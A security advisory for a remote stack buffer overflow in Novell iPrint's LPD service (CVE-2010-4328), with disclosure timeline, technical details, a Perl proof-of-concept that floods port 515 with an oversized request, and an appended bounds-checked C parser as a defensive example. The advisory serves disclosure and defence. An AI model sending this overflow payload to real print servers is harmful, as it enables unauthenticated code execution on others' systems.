#####################################################################################

Application:   Novell iPrint LPD Remote Code Execution Vulnerability
Platforms:     Linux
Exploitation:  Remote code execution
CVE Number:    CVE-2010-4328
Novell TID:    7007858.
ZDI:           ZDI-11-087
{PRL}:         2011-01
Author:        Francis Provencher (Protek Research Lab's)
Blog:          http://www.protekresearchlab.com/

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) The Code

#####################################################################################

===============
1) Introduction
===============

Novell, Inc. is a global software and services company based in Waltham, Massachusetts.
The company specializes in enterprise operating systems, such as SUSE Linux Enterprise
and Novell NetWare; identity, security, and systems management solutions; and
collaboration solutions, such as Novell Groupwise and Novell Pulse.

Novell was instrumental in making the Utah Valley a focus for technology and software
development. Novell technology contributed to the emergence of local area networks,
which displaced the dominant mainframe computing model and changed computing worldwide.
Today, a primary focus of the company is on developing open source software for
enterprise clients.

(http://en.wikipedia.org/wiki/Novell)

#####################################################################################

============================
2) Report Timeline
============================

2010-12-01 - Vulnerability reported to vendor
2011-02-16 - Coordinated public release of advisory

#####################################################################################

============================
3) Technical details
============================

This vulnerability allows remote attackers to execute arbitrary code on vulnerable
installations of Novell iPrint Server. Authentication is not required to exploit this
vulnerability.
The flaw exists within the '/opt/novell/iprint/bin/ipsmd' component this component communicates with 'ilprsrvd' which listens on TCP port 515. When handling multiple LPR opcodes the process blindly copies user supplied data into a fixed-length buffer on the stack. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the iprint user. ##################################################################################### =========== 4) POC =========== #!/usr/bin/perl use Getopt::Std; use IO::Socket::INET; $SIG{INT} = \&abort; my $host = '10.102.3.79'; my $port = 515; my $proto = 'tcp'; my $sockType = SOCK_STREAM; my $timeout = 1; my %opt; my $opt_string = 'hH:P:t:'; getopts( "$opt_string", \%opt ); if (defined $opt{h}) { usage() } my @commands = ( {Command => 'Send', Data => "\x01\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x44\x43\x42\x41\x0a"}, ); my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => $port, Proto => $proto, Type => $sockType, Timeout => $timeout, ) or die "socket error: $!\n\n"; print "connected to: $host:$port\n"; $sock->autoflush(1); binmode $sock; foreach my $command (@commands) { if ($command->{'Command'} eq 'Receive') { my $buf = receive($sock, $timeout); if (length $buf) { print "received: [$buf]\n"; } } elsif ($command->{'Command'} eq 'Send') { print "sending: [".$command->{'Data'}."]\n"; send ($sock, $command->{'Data'}, 0) or die "send failed, reason: $!\n"; } } close ($sock);
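
#####################################################################################

Added example (not part of the original advisory and not Novell's code): a bounds-checked parser for one RFC 1179 LPD command line, the defensive counterpart to the unchecked stack copy described in section 3. The names lpd_parse_request and struct lpd_request, the 64-byte queue limit, the printable-ASCII policy and the sample request are assumptions of this example; the advisory does not state the real buffer size.

```c
#include <stddef.h>
#include <string.h>

/* Assumed limit for this example; the advisory does not give ipsmd's buffer size. */
#define LPD_QUEUE_MAX 64

enum lpd_status { LPD_OK, LPD_INCOMPLETE, LPD_BAD_OPCODE, LPD_TOO_LONG, LPD_BAD_QUEUE };

struct lpd_request {
    unsigned char opcode;          /* RFC 1179 daemon command, 0x01..0x05 */
    char queue[LPD_QUEUE_MAX + 1]; /* NUL-terminated queue name */
    size_t operands_off;           /* offset of operands in buf, 0 if none */
};

/* Parse "opcode | queue [SP operands] LF". Lengths are checked before any copy.
 * The caller must cap its receive buffer so LPD_INCOMPLETE cannot grow unbounded. */
enum lpd_status lpd_parse_request(const unsigned char *buf, size_t len,
                                  struct lpd_request *out)
{
    if (len < 2)
        return LPD_INCOMPLETE;
    if (buf[0] < 0x01 || buf[0] > 0x05)
        return LPD_BAD_OPCODE;
    const unsigned char *lf = memchr(buf + 1, '\n', len - 1);
    if (lf == NULL)
        return LPD_INCOMPLETE;
    size_t line_len = (size_t)(lf - buf), qlen = 0;
    while (1 + qlen < line_len && buf[1 + qlen] != ' ')
        qlen++;
    if (qlen > LPD_QUEUE_MAX)
        return LPD_TOO_LONG;       /* reject outright, never truncate and continue */
    if (qlen == 0)
        return LPD_BAD_QUEUE;
    for (size_t i = 0; i < qlen; i++)
        if (buf[1 + i] < 0x21 || buf[1 + i] > 0x7e)
            return LPD_BAD_QUEUE;  /* printable ASCII only (policy of this example) */
    memcpy(out->queue, buf + 1, qlen);
    out->queue[qlen] = '\0';
    out->opcode = buf[0];
    out->operands_off = (1 + qlen < line_len) ? qlen + 2 : 0;
    return LPD_OK;
}

int main(void)
{
    struct lpd_request r;
    const unsigned char ok[] = "\x03lp0 alice\n"; /* constructed sample request */
    return lpd_parse_request(ok, sizeof ok - 1, &r) == LPD_OK ? 0 : 1;
}
```

A request with the same shape as the one in section 4 (one opcode byte, a long run of filler, LF) returns LPD_TOO_LONG before any byte reaches the fixed-size field.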